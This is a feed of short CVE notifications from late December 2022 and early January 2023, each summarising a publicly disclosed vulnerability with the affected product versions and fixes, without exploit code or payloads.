| 2023-01-02 12:29:48 |
🚨 CVE-2022-40711PrimeKey EJBCA 7.9.0.2 Community allows stored XSS in the End Entity section. A user with the RA Administrator role can inject an XSS payload to target higher-privilege users.🎖@cveNotify |
|
| 2023-01-02 12:29:46 |
🚨 CVE-2022-45027perfSONAR before 4.4.6, when performing participant discovery, incorrectly uses an HTTP request header value to determine a local address.🎖@cveNotify |
|
| 2023-01-02 12:29:45 |
🚨 CVE-2022-45213perfSONAR before 4.4.6 inadvertently supports the parse option for a file:// URL.🎖@cveNotify |
|
| 2023-01-02 12:29:44 |
🚨 CVE-2022-47634M-Link Archive Server in Isode M-Link R16.2v1 through R17.0 before R17.0v24 allows non-administrative users to access and manipulate archive data via certain HTTP endpoints, aka LINK-2867.🎖@cveNotify |
|
| 2023-01-02 12:29:42 |
🚨 CVE-2022-48198The ntpd_driver component before 1.3.0 and 2.x before 2.2.0 for Robot Operating System (ROS) allows attackers, who control the source code of a different node in the same ROS application, to change a robot's behavior. This occurs because a topic name depends on the attacker-controlled time_ref_topic parameter.🎖@cveNotify |
|
| 2023-01-02 12:29:41 |
🚨 CVE-2022-41981A stack-based buffer overflow vulnerability exists in the TGA file format parser of OpenImageIO v2.3.19.0. A specially-crafted targa file can lead to out of bounds read and write on the process stack, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-01-01 00:29:38 |
🚨 CVE-2022-45939GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2023-01-01 00:29:37 |
🚨 CVE-2022-22728A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.🎖@cveNotify |
|
| 2022-12-31 22:29:41 |
🚨 CVE-2014-125028A vulnerability was found in valtech IDP Test Client and classified as problematic. Affected by this issue is some unknown functionality of the file python-flask/main.py. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The name of the patch is f1e7b3d431c8681ec46445557125890c14fa295f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217148.🎖@cveNotify |
|
| 2022-12-31 22:29:40 |
🚨 CVE-2017-20160A vulnerability was found in flitto express-param up to 0.x. It has been classified as critical. This affects an unknown part of the file lib/fetchParams.js. The manipulation leads to improper handling of extra parameters. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is db94f7391ad0a16dcfcba8b9be1af385b25c42db. It is recommended to upgrade the affected component. The identifier VDB-217149 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-31 22:29:37 |
🚨 CVE-2018-25061A vulnerability was found in rgb2hex up to 0.1.5. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 0.1.6 is able to address this issue. The name of the patch is 9e0c38594432edfa64136fdf7bb651835e17c34f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217151.🎖@cveNotify |
|
| 2022-12-31 22:29:36 |
🚨 CVE-2022-40150Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack.🎖@cveNotify |
|
| 2022-12-31 22:29:35 |
🚨 CVE-2022-37601Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils 2.0.0 via the name variable in parseQuery.js.🎖@cveNotify |
|
| 2022-12-31 20:29:48 |
🚨 CVE-2022-38850The MPlayer Project mencoder SVN-r38374-13.0.1 is vulnerable to Divide By Zero via the function config () of llibmpcodecs/vf_scale.c.🎖@cveNotify |
|
| 2022-12-31 20:29:44 |
🚨 CVE-2022-38863Certain The MPlayer Project products are vulnerable to Buffer Overflow via function mp_getbits() of libmpdemux/mpeg_hdr.c which affects mencoder and mplayer. This affects mecoder SVN-r38374-13.0.1 and mplayer SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2022-12-31 20:29:43 |
🚨 CVE-2022-38866Certain The MPlayer Project products are vulnerable to Buffer Overflow via read_avi_header() of libmpdemux/aviheader.c . This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2022-12-31 20:29:42 |
🚨 CVE-2022-38858Certain The MPlayer Project products are vulnerable to Buffer Overflow via function mov_build_index() of libmpdemux/demux_mov.c. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2022-12-31 20:29:38 |
🚨 CVE-2022-38864Certain The MPlayer Project products are vulnerable to Buffer Overflow via the function mp_unescape03() of libmpdemux/mpeg_hdr.c. This affects mencoder SVN-r38374-13.0.1 and mplayer SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2022-12-31 20:29:37 |
🚨 CVE-2022-38860Certain The MPlayer Project products are vulnerable to Divide By Zero via function demux_open_avi() of libmpdemux/demux_avi.c which affects mencoder. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2022-12-31 20:29:36 |
🚨 CVE-2022-24720image_processing is an image processing wrapper for libvips and ImageMagick/GraphicsMagick. Prior to version 1.12.2, using the `#apply` method from image_processing to apply a series of operations that are coming from unsanitized user input allows the attacker to execute shell commands. This method is called internally by Active Storage variants, so Active Storage is vulnerable as well. The vulnerability has been fixed in version 1.12.2 of image_processing. As a workaround, users who process based on user input should always sanitize the user input by allowing only a constrained set of operations.🎖@cveNotify |
|
| 2022-12-31 18:29:38 |
🚨 CVE-2014-125027A vulnerability has been found in Yuna Scatari TBDev up to 2.1.17 and classified as problematic. Affected by this vulnerability is the function get_user_icons of the file usersearch.php. The manipulation of the argument n/r/r2/em/ip/co/ma/d/d2/ul/ul2/ls/ls2/dl/dl2 leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.1.18 is able to address this issue. The name of the patch is 0ba3fd4be29dd48fa4455c236a9403b3149a4fd4. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217147.🎖@cveNotify |
|
| 2022-12-31 18:29:37 |
🚨 CVE-2022-4515A flaw was found in Exuberant Ctags in the way it handles the "-o" option. This option specifies the tag filename. A crafted tag filename specified in the command line or in the configuration file results in arbitrary command execution because the externalSortTags() in sort.c calls the system(3) function in an unsafe way.🎖@cveNotify |
|
| 2022-12-31 13:29:43 |
🚨 CVE-2022-0730Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.🎖@cveNotify |
|
| 2022-12-31 13:29:39 |
🚨 CVE-2020-25706A cross-site scripting (XSS) vulnerability exists in templates_import.php (Cacti 1.2.13) due to Improper escaping of error message during template import preview in the xml_path field🎖@cveNotify |
|
| 2022-12-31 13:29:38 |
🚨 CVE-2020-8813graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.🎖@cveNotify |
|
| 2022-12-31 13:29:37 |
🚨 CVE-2017-20158** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in vova07 Yii2 FileAPI Widget up to 0.1.8. It has been declared as problematic. Affected by this vulnerability is the function run of the file actions/UploadAction.php. The manipulation of the argument file leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.1.9 is able to address this issue. The name of the patch is c00d1e4fc912257fca1fce66d7a163bdbb4c8222. It is recommended to upgrade the affected component. The identifier VDB-217141 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-31 13:29:36 |
🚨 CVE-2017-20159A vulnerability was found in rf Keynote up to 0.x. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/keynote/rumble.rb. The manipulation of the argument value leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is 05be4356b0a6ca7de48da926a9b997beb5ffeb4a. It is recommended to upgrade the affected component. VDB-217142 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-31 12:29:43 |
🚨 CVE-2017-20156A vulnerability was found in Exciting Printer and classified as critical. This issue affects some unknown processing of the file lib/printer/jobs/prepare_page.rb of the component Argument Handler. The manipulation of the argument URL leads to command injection. The name of the patch is 5f8c715d6e2cc000f621a6833f0a86a673462136. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217139.🎖@cveNotify |
|
| 2022-12-31 12:29:39 |
🚨 CVE-2017-20157A vulnerability was found in Ariadne Component Library up to 2.x. It has been classified as critical. Affected is an unknown function of the file src/url/Url.php. The manipulation leads to server-side request forgery. Upgrading to version 3.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217140.🎖@cveNotify |
|
| 2022-12-31 12:29:38 |
🚨 CVE-2022-4865Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-31 12:29:37 |
🚨 CVE-2022-4867Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 2.0.0-beta1.🎖@cveNotify |
|
| 2022-12-31 07:29:36 |
🚨 CVE-2022-48195An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.🎖@cveNotify |
|
| 2022-12-31 02:30:03 |
🚨 CVE-2022-34678NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where an unprivileged user can cause a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2022-12-31 02:30:02 |
🚨 CVE-2022-34679NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an unhandled return value can lead to a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2022-12-31 02:30:01 |
🚨 CVE-2022-34680NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an integer truncation can lead to an out-of-bounds read, which may lead to denial of service.🎖@cveNotify |
|
| 2022-12-31 02:30:00 |
🚨 CVE-2022-34681NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler, where improper input validation of a display-related data structure may lead to denial of service.🎖@cveNotify |
|
| 2022-12-31 02:29:58 |
🚨 CVE-2022-34682NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged regular user can cause a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2022-12-31 02:29:54 |
🚨 CVE-2022-34683NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service.🎖@cveNotify |
|
| 2022-12-31 02:29:53 |
🚨 CVE-2022-34684NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an off-by-one error may lead to data tampering or information disclosure.🎖@cveNotify |
|
| 2022-12-31 02:29:52 |
🚨 CVE-2022-42254NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an out-of-bounds array access may lead to denial of service, data tampering, or information disclosure.🎖@cveNotify |
|
| 2022-12-31 02:29:51 |
🚨 CVE-2022-42255NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an out-of-bounds array access may lead to denial of service, information disclosure, or data tampering.🎖@cveNotify |
|
| 2022-12-31 02:29:50 |
🚨 CVE-2022-42256NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow in index validation may lead to denial of service, information disclosure, or data tampering.🎖@cveNotify |
|
| 2022-12-31 02:29:46 |
🚨 CVE-2022-42257NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to information disclosure, data tampering or denial of service.🎖@cveNotify |
|
| 2022-12-31 02:29:45 |
🚨 CVE-2022-42258NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to denial of service, data tampering, or information disclosure.🎖@cveNotify |
|
| 2022-12-31 02:29:44 |
🚨 CVE-2022-42260NVIDIA vGPU Display Driver for Linux guest contains a vulnerability in a D-Bus configuration file, where an unauthorized user in the guest VM can impact protected D-Bus endpoints, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.🎖@cveNotify |
|
| 2022-12-31 02:29:43 |
🚨 CVE-2022-42261NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where an input index is not validated, which may lead to buffer overrun, which in turn may cause data tampering, information disclosure, or denial of service.🎖@cveNotify |
|
| 2022-12-31 02:29:39 |
🚨 CVE-2022-42262NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where an input index is not validated, which may lead to buffer overrun, which in turn may cause data tampering, information disclosure, or denial of service.🎖@cveNotify |
|
| 2022-12-31 02:29:38 |
🚨 CVE-2022-42263NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an Integer overflow may lead to denial of service or information disclosure.🎖@cveNotify |
|
| 2022-12-31 02:29:37 |
🚨 CVE-2022-42265NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to information disclosure or data tampering.🎖@cveNotify |
|
| 2022-12-31 02:29:36 |
🚨 CVE-2022-42266NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where an unprivileged regular user can cause exposure of sensitive information to an actor that is not explicitly authorized to have access to that information, which may lead to limited information disclosure.🎖@cveNotify |
|
| 2022-12-30 20:29:49 |
🚨 CVE-2022-4697The ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wp_user_cover_default_image_url’ parameter in versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2022-12-30 20:29:46 |
🚨 CVE-2022-4698The ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several form fields in versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2022-12-30 20:29:45 |
🚨 CVE-2022-40233IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 235599.🎖@cveNotify |
|
| 2022-12-30 20:29:44 |
🚨 CVE-2022-43381IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 238639.🎖@cveNotify |
|
| 2022-12-30 15:29:47 |
🚨 CVE-2022-43593A denial of service vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to null pointer dereference. An attacker can provide malicious input to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-30 15:29:46 |
🚨 CVE-2022-43594Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerability applies to writing .bmp files.🎖@cveNotify |
|
| 2022-12-30 15:29:42 |
🚨 CVE-2020-36637** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Chris92de AdminServ. It has been declared as problematic. This vulnerability affects unknown code of the file resources/core/adminserv.php. The manipulation of the argument text leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 3ed17dab3b4d6e8bf1c82ddfbf882314365e9cd7. It is recommended to apply a patch to fix this issue. VDB-217042 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-30 15:29:41 |
🚨 CVE-2022-24697Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “-- conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.🎖@cveNotify |
|
| 2022-12-30 15:29:40 |
🚨 CVE-2019-25070** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in WolfCMS up to 0.8.3.1. It has been rated as problematic. This issue affects some unknown processing of the file /wolfcms/?/admin/user/add of the component User Add. The manipulation of the argument name leads to basic cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-135125 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-30 14:29:57 |
🚨 CVE-2018-25059A vulnerability was found in pastebinit up to 0.2.2 and classified as problematic. Affected by this issue is the function pasteHandler of the file server.go. The manipulation of the argument r.URL.Path leads to path traversal. Upgrading to version 0.2.3 is able to address this issue. The name of the patch is 1af2facb6d95976c532b7f8f82747d454a092272. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217040.🎖@cveNotify |
|
| 2022-12-30 14:29:56 |
🚨 CVE-2017-20151A vulnerability classified as problematic was found in iText RUPS. This vulnerability affects unknown code of the file src/main/java/com/itextpdf/rups/model/XfaFile.java. The manipulation leads to xml external entity reference. The name of the patch is ac5590925874ef810018a6b60fec216eee54fb32. It is recommended to apply a patch to fix this issue. VDB-217054 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 14:29:54 |
🚨 CVE-2017-20152A vulnerability, which was classified as problematic, was found in aerouk imageserve. Affected is an unknown function of the file public/viewer.php of the component File Handler. The manipulation of the argument filelocation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is bd23c784f0e5cb12f66d15c100248449f87d72e2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217056.🎖@cveNotify |
|
| 2022-12-30 14:29:52 |
🚨 CVE-2017-20153A vulnerability has been found in aerouk imageserve and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument REQUEST_URI leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2ac3cd4f90b4df66874fab171376ca26868604c4. It is recommended to apply a patch to fix this issue. The identifier VDB-217057 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 14:29:51 |
🚨 CVE-2018-25060A vulnerability was found in Macaron csrf and classified as problematic. Affected by this issue is some unknown functionality of the file csrf.go. The manipulation of the argument Generate leads to sensitive cookie without secure attribute. The attack may be launched remotely. The name of the patch is dadd1711a617000b70e5e408a76531b73187031c. It is recommended to apply a patch to fix this issue. VDB-217058 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 14:29:49 |
🚨 CVE-2020-36637A vulnerability was found in Chris92de AdminServ. It has been declared as problematic. This vulnerability affects unknown code of the file resources/core/adminserv.php. The manipulation of the argument text leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 3ed17dab3b4d6e8bf1c82ddfbf882314365e9cd7. It is recommended to apply a patch to fix this issue. VDB-217042 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 14:29:47 |
🚨 CVE-2020-36638A vulnerability was found in Chris92de AdminServ. It has been rated as problematic. This issue affects some unknown processing of the file resources/core/adminserv.php. The manipulation of the argument error leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 9a45087814295de6fb3a3fe38f96293665234da1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217043.🎖@cveNotify |
|
| 2022-12-30 14:29:46 |
🚨 CVE-2022-4858Insertion of Sensitive Information into Log Files in M-Files Server in M-Files before 22.10.11846.0 could allow to obtain sensitive tokens from logs, if specific configurations were set.🎖@cveNotify |
|
| 2022-12-30 14:29:44 |
🚨 CVE-2022-4859A vulnerability, which was classified as problematic, has been found in Joget up to 7.0.33. This issue affects the function submitForm of the file wflow-core/src/main/java/org/joget/plugin/enterprise/UserProfileMenu.java of the component User Profile Menu. The manipulation of the argument firstName/lastName leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 7.0.34 is able to address this issue. The name of the patch is 9a77f508a2bf8cf661d588f37a4cc29ecaea4fc8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217055.🎖@cveNotify |
|
| 2022-12-30 14:29:43 |
🚨 CVE-2022-4860A vulnerability was found in KBase Metrics. It has been classified as critical. This affects the function upload_user_data of the file source/daily_cron_jobs/methods_upload_user_stats.py. The manipulation leads to sql injection. The name of the patch is 959dfb6b05991e30b0fa972a1ecdcaae8e1dae6d. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217059.🎖@cveNotify |
|
| 2022-12-30 14:29:41 |
🚨 CVE-2022-43396In the fix for CVE-2022-24697, a blacklist is used to filter user input commands. But there is a risk of being bypassed. The user can control the command by controlling the kylin.engine.spark-cmd parameter of conf.🎖@cveNotify |
|
| 2022-12-30 14:29:40 |
🚨 CVE-2022-44621Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request.🎖@cveNotify |
|
| 2022-12-30 14:29:39 |
🚨 CVE-2022-4857A vulnerability was found in Modbus Tools Modbus Poll up to 9.10.0 and classified as critical. Affected by this issue is some unknown functionality of the file mbpoll.exe of the component mbp File Handler. The manipulation leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-217022 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 12:29:53 |
🚨 CVE-2022-4856A vulnerability has been found in Modbus Tools Modbus Slave up to 7.5.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file mbslave.exe of the component mbs File Handler. The manipulation leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-217021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 12:29:51 |
🚨 CVE-2022-4857A vulnerability was found in Modbus Tools Modbus Poll up to 9.10.0 and classified as critical. Affected by this issue is some unknown functionality of the file mbpoll.exe of the component mbp File Handler. The manipulation leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-217022 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-30 12:29:50 |
🚨 CVE-2022-4855A vulnerability, which was classified as critical, was found in SourceCodester Lead Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-217020.🎖@cveNotify |
|
| 2022-12-30 12:29:49 |
🚨 CVE-2022-48196Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX40 before 1.0.2.60, RAX35 before 1.0.2.60, R6400v2 before 1.0.4.122, R6700v3 before 1.0.4.122, R6900P before 1.3.3.152, R7000P before 1.3.3.152, R7000 before 1.0.11.136, R7960P before 1.4.4.94, and R8000P before 1.4.4.94.🎖@cveNotify |
|
| 2022-12-30 12:29:47 |
🚨 CVE-2022-48194TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate.🎖@cveNotify |
|
| 2022-12-30 07:29:56 |
🚨 CVE-2021-37533Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.🎖@cveNotify |
|
| 2022-12-30 07:29:55 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2022-12-30 07:29:54 |
🚨 CVE-2022-41649A heap out of bounds read vulnerability exists in the handling of IPTC data while parsing TIFF images in OpenImageIO v2.3.19.0. A specially-crafted TIFF file can cause a read of adjacent heap memory, which can leak sensitive process information. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-30 07:29:52 |
🚨 CVE-2022-38143A heap out-of-bounds write vulnerability exists in the way OpenImageIO v2.3.19.0 processes RLE encoded BMP images. A specially-crafted bmp file can write to arbitrary out of bounds memory, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-30 07:29:49 |
🚨 CVE-2022-41639A heap based buffer overflow vulnerability exists in tile decoding code of TIFF image parser in OpenImageIO master-branch-9aeece7a and v2.3.19.0. A specially-crafted TIFF file can lead to an out of bounds memory corruption, which can result in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-30 07:29:48 |
🚨 CVE-2022-41838A code execution vulnerability exists in the DDS scanline parsing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially-crafted .dds can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-30 07:29:47 |
🚨 CVE-2022-47968Heimdall Application Dashboard through 2.5.4 allows reflected and stored XSS via "Application name" to the "Add application" page. The stored XSS will be triggered in the "Application list" page.🎖@cveNotify |
|
| 2022-12-30 00:29:57 |
🚨 CVE-2022-38207There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.8.1 and 10.7.1 which may allow a remote remote, unauthenticated attacker to create a crafted link which when clicked which could execute arbitrary JavaScript code in the victim’s browser.🎖@cveNotify |
|
| 2022-12-30 00:29:56 |
🚨 CVE-2022-38209There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.9.1 and below which may allow a remote, unauthenticated attacker to create a crafted link which when clicked could execute arbitrary JavaScript code in the victim’s browser.🎖@cveNotify |
|
| 2022-12-30 00:29:55 |
🚨 CVE-2022-38210There is a reflected HTML injection vulnerability in Esri Portal for ArcGIS versions 10.9.1 and below that may allow a remote, unauthenticated attacker to create a crafted link which when clicked could render arbitrary HTML in the victim’s browser.🎖@cveNotify |
|
| 2022-12-30 00:29:52 |
🚨 CVE-2022-38211Protections against potential Server-Side Request Forgery (SSRF) vulnerabilities in Esri Portal for ArcGIS versions 10.9.1 and below were not fully honored and may allow a remote, unauthenticated attacker to forge requests to arbitrary URLs from the system, potentially leading to network enumeration or reading from hosts inside the network perimeter, a different issue than CVE-2022-38211 and CVE-2022-38212.🎖@cveNotify |
|
| 2022-12-30 00:29:51 |
🚨 CVE-2022-4839Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-30 00:29:50 |
🚨 CVE-2022-4841Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-30 00:29:46 |
🚨 CVE-2022-4843NULL Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.8.2.🎖@cveNotify |
|
| 2022-12-30 00:29:45 |
🚨 CVE-2022-4845Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-30 00:29:44 |
🚨 CVE-2022-4847Incorrectly Specified Destination in a Communication Channel in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-30 00:29:40 |
🚨 CVE-2022-4850Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2022-12-30 00:29:39 |
🚨 CVE-2022-4631A vulnerability, which was classified as problematic, was found in WP-Ban. Affected is an unknown function of the file ban-options.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 22b925449c84faa9b7496abe4f8f5661cb5eb3bf. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216480.🎖@cveNotify |
|
| 2022-12-29 22:29:44 |
🚨 CVE-2022-46178MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.1 allow users to upload a file, but do not validate the file name, which may lead to upload file to any path. The vulnerability has been fixed in v2.5.1. There are no workarounds.🎖@cveNotify |
|
| 2022-12-29 22:29:43 |
🚨 CVE-2022-46181Gotify server is a simple server for sending and receiving messages in real-time per WebSocket. Versions prior to 2.2.2 contain an XSS vulnerability that allows authenticated users to upload .html files. An attacker could execute client side scripts **if** another user opened a link. The attacker could potentially take over the account of the user that clicked the link. The Gotify UI won't natively expose such a malicious link, so an attacker has to get the user to open the malicious link in a context outside of Gotify. The vulnerability has been fixed in version 2.2.2. As a workaround, you can block access to non image files via a reverse proxy in the `./image` directory.🎖@cveNotify |
